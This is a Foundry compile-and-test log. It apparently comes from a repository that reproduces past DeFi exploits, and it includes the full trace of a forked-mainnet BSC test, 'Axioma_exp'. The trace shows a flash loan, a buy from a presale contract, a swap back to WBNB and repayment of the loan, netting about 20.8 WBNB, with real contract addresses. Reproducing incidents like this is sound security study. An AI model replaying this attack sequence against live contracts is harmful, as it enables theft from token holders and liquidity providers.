Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.25s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-04/Axioma_exp.sol:37:10:
   |
37 |         (address wbnb_usdt_b, address wbnb, uint256 flashLoanAmount) = abi.decode(data, (address, address, uint256));
   |          ^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
  --> src/test/2023-04/Axioma_exp.sol:24:5:
   |
24 |     address wbnb_usdt_b = 0xFeAFe253802b77456B4627F8c2306a9CeBb5d681; // dodo wbnb-usdt pool
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2023-04/Axioma_exp.sol:19:1:
   |
19 | contract ContractTest is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
  --> src/test/2023-04/Axioma_exp.sol:53:5:
   |
53 |     fallback() external payable {}
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-04/Axioma_exp.sol:36:31:
   |
36 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-04/Axioma_exp.sol:36:47:
   |
36 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                               ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-04/Axioma_exp.sol:36:67:
   |
36 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                   ^^^^^^^^^^^^^^^^^^^

Warning (2072): Unused local variable.
  --> src/test/2023-04/Axioma_exp.sol:37:10:
   |
37 |         (address wbnb_usdt_b, address wbnb, uint256 flashLoanAmount) = abi.decode(data, (address, address, uint256));
   |          ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 906.08ms (4.35ms CPU time)

Ran 1 test for src/test/2023-04/Axioma_exp.sol:ContractTest
[PASS] testExploit() (gas: 431111)
Logs:
  [After Attacks]  Attacker WBNB balance: 20.831130089952719912

Traces:
  [3649] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 27620320 [2.762e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [544154] ContractTest::testExploit()
    ├─ [2438] 0xFeAFe253802b77456B4627F8c2306a9CeBb5d681::_BASE_TOKEN_()
    │   └─ ← [Return] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c
    ├─ [534095] 0xFeAFe253802b77456B4627F8c2306a9CeBb5d681::flashLoan(32500000000000000000 [3.25e19], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x000000000000000000000000feafe253802b77456b4627f8c2306a9cebb5d681000000000000000000000000bb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c000000000000000000000000000000000000000000000001c30731cec0320000)
    │   ├─ [29962] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 32500000000000000000 [3.25e19])
    │   │   ├─ emit Transfer(from: 0xFeAFe253802b77456B4627F8c2306a9CeBb5d681, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 32500000000000000000 [3.25e19])
    │   │   ├─  storage changes:
    │   │   │   @ 0x95870720a9b5a6420749f02df2d1248f9e2447dd5ed7a5b82d399a1b406f5197: 0x0000000000000000000000000000000000000000000000058aaa0ba9e4f7e73a → 0x000000000000000000000000000000000000000000000003c7a2d9db24c5e73a
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x000000000000000000000000000000000000000000000001c30731cec0320000
    │   │   └─ ← [Return] true
    │   ├─ [477281] ContractTest::DPPFlashLoanCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 32500000000000000000 [3.25e19], 0, 0x000000000000000000000000feafe253802b77456b4627f8c2306a9cebb5d681000000000000000000000000bb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c000000000000000000000000000000000000000000000001c30731cec0320000)
    │   │   ├─ [9181] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::withdraw(32500000000000000000 [3.25e19])
    │   │   │   ├─ [41] ContractTest::fallback{value: 32500000000000000000}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Withdrawal(src: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 32500000000000000000 [3.25e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000001c30731cec0320000 → 0
    │   │   │   └─ ← [Stop]
    │   │   ├─ [261662] 0x2C25aEe99ED08A61e7407A5674BC2d1A72B5D8E3::buyToken{value: 32500000000000000000}()
    │   │   │   ├─ [2669] 0xB6CF5b77B92a722bF34f6f5D6B1Fe4700908935E::balanceOf(0x2C25aEe99ED08A61e7407A5674BC2d1A72B5D8E3) [staticcall]
    │   │   │   │   └─ ← [Return] 9999996160000000000000000 [9.999e24]
    │   │   │   ├─ [0] 0x3B215f124cA1F3c30e00EE4d96D48e604Cdd9026::fallback{value: 32500000000000000000}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [11964] 0xB6CF5b77B92a722bF34f6f5D6B1Fe4700908935E::transfer(0x3B215f124cA1F3c30e00EE4d96D48e604Cdd9026, 0)
    │   │   │   │   ├─ emit Transfer(from: 0x2C25aEe99ED08A61e7407A5674BC2d1A72B5D8E3, to: 0x3B215f124cA1F3c30e00EE4d96D48e604Cdd9026, value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [224232] 0xB6CF5b77B92a722bF34f6f5D6B1Fe4700908935E::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 9750000000000000000000 [9.75e21])
    │   │   │   │   ├─ emit Transfer(from: 0x2C25aEe99ED08A61e7407A5674BC2d1A72B5D8E3, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 9750000000000000000000 [9.75e21])
    │   │   │   │   ├─ [4716] 0x22fF343D7BeCee1A6DcDc84403d13378De6a688a::setBalance(0x2C25aEe99ED08A61e7407A5674BC2d1A72B5D8E3, 9990246160000000000000000 [9.99e24])
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [139512] 0x22fF343D7BeCee1A6DcDc84403d13378De6a688a::setBalance(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 9750000000000000000000 [9.75e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 10: 5 → 6
    │   │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 0 → 1
    │   │   │   │   │   │   @ 8: 0x00000000000000000000000000000000000000000332e3f342e385472a4c5f0b → 0x00000000000000000000000000000000000000000332e603cf51e39064e45f0b
    │   │   │   │   │   │   @ 0x5223e63f0507f82c7e25e324cdfe3030bae704b36135ec7694b55330a3b5b731: 0 → 0x0000000000000000000000000000000000000000000002108c6e5e493a980000
    │   │   │   │   │   │   @ 0x5f6eee5777689fac8d5a6d5f66349ac0b0aaf490b4d918486710d1c6412d3a72: 0 → 0x0000000000000000000000000000000000000000000002108c6e5e493a980000
    │   │   │   │   │   │   @ 0x0c629eb3c393d1a1823b74e4cc59232613764e287af71969da751500735b5f5d: 0 → 5
    │   │   │   │   │   │   @ 0xc65a7bb8d6351c1cf70c95a316cc6a92839c986682d98bc35f958f4883f9d2ad: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x837f16b8f4f226b72936bc9f9a31050eca2c3597d64234c348fb61cce47048a4: 0 → 0x0000000000000000000000000000000000000000000000000000000001a573e0
    │   │   │   │   │   @ 0x36ffa52a639db501d2b97d54419e3076cad0a151c060970e358a11496e4d2c11: 0x000000000000000000000000000000000000000000084594e0c995a0a8800000 → 0x000000000000000000000000000000000000000000084384545b37576de80000
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000002108c6e5e493a980000
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [669] 0xB6CF5b77B92a722bF34f6f5D6B1Fe4700908935E::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 9750000000000000000000 [9.75e21]
    │   │   ├─ [24705] 0xB6CF5b77B92a722bF34f6f5D6B1Fe4700908935E::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x44bf1039324fcbfda472196706fa68525cb38db0f3d91f5ca7d489ff92357e45: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [147824] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(9750000000000000000000 [9.75e21], 0, [0xB6CF5b77B92a722bF34f6f5D6B1Fe4700908935E, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1682316206 [1.682e9])
    │   │   │   ├─ [71075] 0xB6CF5b77B92a722bF34f6f5D6B1Fe4700908935E::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x6a3Fa7D2C71fd7D44BF3a2890aA257F34083c90f, 9750000000000000000000 [9.75e21])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xB6CF5b77B92a722bF34f6f5D6B1Fe4700908935E, value: 536250000000000000000 [5.362e20])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x6a3Fa7D2C71fd7D44BF3a2890aA257F34083c90f, value: 9213750000000000000000 [9.213e21])
    │   │   │   │   ├─ [9595] 0x22fF343D7BeCee1A6DcDc84403d13378De6a688a::setBalance(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5f6eee5777689fac8d5a6d5f66349ac0b0aaf490b4d918486710d1c6412d3a72: 0x0000000000000000000000000000000000000000000002108c6e5e493a980000 → 0
    │   │   │   │   │   │   @ 0x0c629eb3c393d1a1823b74e4cc59232613764e287af71969da751500735b5f5d: 5 → 0
    │   │   │   │   │   │   @ 10: 6 → 5
    │   │   │   │   │   │   @ 0xc65a7bb8d6351c1cf70c95a316cc6a92839c986682d98bc35f958f4883f9d2ad: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496 → 0
    │   │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 1 → 0
    │   │   │   │   │   │   @ 8: 0x00000000000000000000000000000000000000000332e603cf51e39064e45f0b → 0x00000000000000000000000000000000000000000332e3f342e385472a4c5f0b
    │   │   │   │   │   │   @ 0x5223e63f0507f82c7e25e324cdfe3030bae704b36135ec7694b55330a3b5b731: 0x0000000000000000000000000000000000000000000002108c6e5e493a980000 → 0
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [2716] 0x22fF343D7BeCee1A6DcDc84403d13378De6a688a::setBalance(0x6a3Fa7D2C71fd7D44BF3a2890aA257F34083c90f, 23371418659303833605910 [2.337e22])
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564029707584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 25: 0x00000000000000000000000000000000000000000000005cfa9e48883f9547b8 → 0x00000000000000000000000000000000000000000000006a31543e16e10c47b8
    │   │   │   │   │   @ 26: 0x000000000000000000000000000000000000000000000025310c1d034ca21c98 → 0x00000000000000000000000000000000000000000000002a7a21b26f8d381c98
    │   │   │   │   │   @ 0x69a98b37fffb724b64c697cd645c215813a6f7ca7e18dbf61267fbf22428b2d8: 0x0000000000000000000000000000000000000000000000d0593494b1ead39e2d → 0x0000000000000000000000000000000000000000000000ed6b2b4a854e0c9e2d
    │   │   │   │   │   @ 0x11f4b784590597635280b4205addb1014b9b8a03682e9a84ec34f932b79b94f0: 0x0000000000000000000000000000000000000000000002ff7d1f1b17edd71716 → 0x0000000000000000000000000000000000000000000004f2f796c38dc5361716
    │   │   │   │   │   @ 0x44bf1039324fcbfda472196706fa68525cb38db0f3d91f5ca7d489ff92357e45: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffdef7391a1b6c567ffff
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000002108c6e5e493a980000 → 0
    │   │   │   │   │   @ 10: 6 → 5
    │   │   │   │   │   @ 27: 0x00000000000000000000000000000000000000000000004a62183a069944395b → 0x000000000000000000000000000000000000000000000054f44364df1a70395b
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [2893] 0x6a3Fa7D2C71fd7D44BF3a2890aA257F34083c90f::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 14157668659303833605910 [1.415e22], 135484087470763777599 [1.354e20], 1682282924 [1.682e9]
    │   │   │   ├─ [669] 0xB6CF5b77B92a722bF34f6f5D6B1Fe4700908935E::balanceOf(0x6a3Fa7D2C71fd7D44BF3a2890aA257F34083c90f) [staticcall]
    │   │   │   │   └─ ← [Return] 23371418659303833605910 [2.337e22]
    │   │   │   ├─ [62477] 0x6a3Fa7D2C71fd7D44BF3a2890aA257F34083c90f::swap(0, 53331130089952719912 [5.333e19], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [27962] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 53331130089952719912 [5.333e19])
    │   │   │   │   │   ├─ emit Transfer(from: 0x6a3Fa7D2C71fd7D44BF3a2890aA257F34083c90f, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 53331130089952719912 [5.333e19])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x4c9bfd1ae12e270648f3f6f464ec693082a75b2031a6065dd2ffd0607c598d84: 0x00000000000000000000000000000000000000000000000758382bbaacd39e3f → 0x0000000000000000000000000000000000000000000000047419ef790b0c6a17
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x000000000000000000000000000000000000000000000002e41e3c41a1c73428
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [669] 0xB6CF5b77B92a722bF34f6f5D6B1Fe4700908935E::balanceOf(0x6a3Fa7D2C71fd7D44BF3a2890aA257F34083c90f) [staticcall]
    │   │   │   │   │   └─ ← [Return] 23371418659303833605910 [2.337e22]
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x6a3Fa7D2C71fd7D44BF3a2890aA257F34083c90f) [staticcall]
    │   │   │   │   │   └─ ← [Return] 82152957380811057687 [8.215e19]
    │   │   │   │   ├─ emit Sync(reserve0: 23371418659303833605910 [2.337e22], reserve1: 82152957380811057687 [8.215e19])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 9213750000000000000000 [9.213e21], amount1In: 0, amount0Out: 0, amount1Out: 53331130089952719912 [5.333e19], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 10: 0x00000000000000000000000000004ebc4cc4303bf0d5b2c03c88f503b9a80bf7 → 0x00000000000000000000000000004ef15e2e632e95234bcd419c61c030c356c7
    │   │   │   │   │   @ 9: 0x000000000000000000000000000000007a29890d352c2d355d7a491dd38949d1 → 0x000000000000000000000000000000007b6808663eb236b669d131f1c66d3dc3
    │   │   │   │   │   @ 8: 0x644599ac00000000000758382bbaacd39e3f0000000002ff7d1f1b17edd71716 → 0x64461bae0000000000047419ef790b0c6a170000000004f2f796c38dc5361716
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 53331130089952719912 [5.333e19]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3262] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681, 32500000000000000000 [3.25e19])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xFeAFe253802b77456B4627F8c2306a9CeBb5d681, value: 32500000000000000000 [3.25e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000002e41e3c41a1c73428 → 0x00000000000000000000000000000000000000000000000121170a72e1953428
    │   │   │   │   @ 0x95870720a9b5a6420749f02df2d1248f9e2447dd5ed7a5b82d399a1b406f5197: 0x000000000000000000000000000000000000000000000003c7a2d9db24c5e73a → 0x0000000000000000000000000000000000000000000000058aaa0ba9e4f7e73a
    │   │   │   └─ ← [Return] true
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 20831130089952719912 [2.083e19]
    │   │   ├─ emit log_named_decimal_uint(key: "[After Attacks]  Attacker WBNB balance", val: 20831130089952719912 [2.083e19], decimals: 18)
    │   │   ├─  storage changes:
    │   │   │   @ 0x44bf1039324fcbfda472196706fa68525cb38db0f3d91f5ca7d489ff92357e45: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   └─ ← [Stop]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   │   └─ ← [Return] 102225531916141455162 [1.022e20]
    │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   │   └─ ← [Return] 983716806743811620862188 [9.837e23]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   │   └─ ← [Return] 102225531916141455162 [1.022e20]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   │   └─ ← [Return] 983716806743811620862188 [9.837e23]
    │   ├─ emit DODOFlashLoan(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 32500000000000000000 [3.25e19], : 0)
    │   └─ ← [Stop]
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 35.60s (33.16s CPU time)

Ran 2 test suites in 35.62s (36.51s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
